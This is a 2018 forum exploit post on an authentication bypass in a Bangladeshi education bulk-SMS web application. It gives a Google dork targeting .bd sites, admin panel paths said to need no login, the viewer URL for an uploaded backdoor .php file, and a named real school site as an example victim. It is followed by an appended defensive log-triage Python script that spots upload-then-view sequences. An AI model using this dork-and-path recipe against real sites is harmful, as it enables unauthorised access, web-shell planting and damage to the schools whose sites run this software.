Topic: BulkSMSSystem BD Education Improper Auth Backdoor Vuln
KingSkrupellos
04.09.2018 06:01
#################################################################################################

# Exploit Title : BulkSMSSystem Bangladesh Education Improper Authentication Backdoor Account Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] + CWE-288 - [ Authentication Bypass Using an Alternate Path or Channel ]

#################################################################################################

# Description for Improper Authentication Vulnerability [ CWE-287 ]

+ When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

+ If software incorrectly validates user logon information or allows different techniques of malicious credential gathering (e.g. brute force, spoofing, or changing the URL links without giving a username and password), an attacker can gain certain privileges within the application or disclose sensitive information.

+ If the parameter is equal to "user", the application allows viewing the information; if it is equal to "admin", it is possible to edit information on the page:

+ If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.

+ The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter the application, or even execute arbitrary code.

+ An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks.

Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]

#########################################################################################

# Google Dork : inurl:/admin/myfile/ site:bd

# Exploit : /admin/myfile/index.php

No Username and Password Required.

# Usable Admin Control Panel Path URL Links =>

/admin/index.php
/admin/myfile/index.php
/admin/member.php
/admin/member2.php
/admin/headline.php

See your uploaded backdoor .php file here => /pdfview.php?id=[ID-NUMBER]

#################################################################################################

# Example Site => pbmhhschandpur.edu.bd => [ Proof of Concept ] => archive.is/m9D3m

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
(This topic was last edited on 05.09.2018 at 01:24. Edited by: KingSkrupellos.)

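A log-triage sketch for operators of an affected installation, added here as an example and not part of the original post: it correlates an accepted POST to an /admin/ script with a later /pdfview.php?id= request from the same client, the sequence the post describes. The log format, the sample lines, the 30-minute window and the name `upload_then_view` are assumptions.

```python
import re
from datetime import datetime, timedelta

ADMIN_PREFIX = "/admin/"       # admin scripts listed in the post live under this path
VIEWER = "/pdfview.php?id="    # viewer URL named in the post

# Common Log Format prefix; extra fields (referer, user agent) are ignored.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Sep/2018:06:01:10 +0000] "GET /admin/myfile/index.php HTTP/1.1" 200 5120
203.0.113.7 - - [04/Sep/2018:06:02:31 +0000] "POST /admin/myfile/index.php HTTP/1.1" 200 734
203.0.113.7 - - [04/Sep/2018:06:02:58 +0000] "GET /pdfview.php?id=41 HTTP/1.1" 200 88
198.51.100.9 - - [04/Sep/2018:07:15:00 +0000] "GET /pdfview.php?id=12 HTTP/1.1" 200 90311
198.51.100.20 - - [04/Sep/2018:08:00:00 +0000] "POST /admin/member.php HTTP/1.1" 302 0
198.51.100.20 - - [04/Sep/2018:08:00:05 +0000] "GET /pdfview.php?id=13 HTTP/1.1" 200 90311
"""

def upload_then_view(log_text, window=timedelta(minutes=30)):
    """Return (ip, admin_path, viewer_path) for each client whose 2xx POST to an
    admin script is followed by a 2xx viewer request within `window`."""
    last_post = {}  # client ip -> (time, path) of its latest accepted admin POST
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Assumption: only 2xx counts as accepted; a guarded panel would
        # answer an unauthenticated request with a redirect, 401 or 403.
        if int(m["status"]) // 100 != 2:
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], m["path"]
        if m["method"] == "POST" and path.startswith(ADMIN_PREFIX):
            last_post[ip] = (when, path)
        elif m["method"] == "GET" and path.startswith(VIEWER):
            prev = last_post.get(ip)
            if prev and timedelta(0) <= when - prev[0] <= window:
                hits.append((ip, prev[1], path))
    return hits

if __name__ == "__main__":
    for ip, admin_path, viewer_path in upload_then_view(SAMPLE_LOG):
        print(f"review: {ip} posted to {admin_path}, then fetched {viewer_path}")
```

Each hit is a lead for manual review: match the client and timestamp against known administrator activity, and inspect the file behind the reported id.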